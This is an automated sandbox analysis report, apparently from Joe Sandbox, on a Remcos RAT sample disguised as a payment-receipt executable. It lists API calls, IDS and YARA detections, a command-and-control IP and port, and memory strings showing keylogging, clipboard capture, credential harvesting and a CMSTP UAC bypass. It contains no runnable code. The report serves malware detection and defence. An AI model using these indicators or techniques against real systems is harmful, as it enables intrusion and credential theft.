Source: Binary string: pUIh.pdb | source: SwiftCopy_PaymtRecpt121228.exe, eaJOpx.exe.0.dr
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10006580 FindFirstFileExA,7_2_10006580
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B43F
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0044D5F9 FindFirstFileExA,12_2_0044D5F9
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C79
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 4x nop then jmp 06F4E183h, 0_2_06F4D7D4
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 4x nop then jmp 0779D3CBh, 9_2_0779CA1C

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49706 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49984 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49985 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49987 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49986 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49988 -> 192.210.150.17:56887
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49983 -> 192.210.150.17:56887
Source: Malware configuration extractor | IPs: 192.210.150.17
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49708 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00426107 recv,12_2_00426107
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: SwiftCopy_PaymtRecpt121228.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, eaJOpx.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl$
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
                Source: bhvB35D.tmp.15.drString found in binary or memory: http://ocsp.digicert.com0
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2066490817.0000000002631000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2116715944.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4054409156.0000000000B33000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055093570.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4055659424.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SwiftCopy_PaymtRecpt121228.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: SwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: SwiftCopy_PaymtRecpt121228.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041BB87 SystemParametersInfoW

                System Summary

                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023E3E280_2_023E3E28
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023EE1040_2_023EE104
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_023E6F900_2_023E6F90
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05810BD40_2_05810BD4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058101200_2_05810120
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058101300_2_05810130
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_058120F00_2_058120F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A574480_2_05A57448
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A574580_2_05A57458
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_05A57A080_2_05A57A08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF7CAB0_2_06EF7CAB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFF4180_2_06EFF418
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFDDF00_2_06EFDDF0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF65C00_2_06EF65C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF72710_2_06EF7271
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE3E80_2_06EFE3E8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF8B280_2_06EF8B28
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAE080_2_06EFAE08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAE180_2_06EFAE18
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE7E00_2_06EFE7E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE7D00_2_06EFE7D0
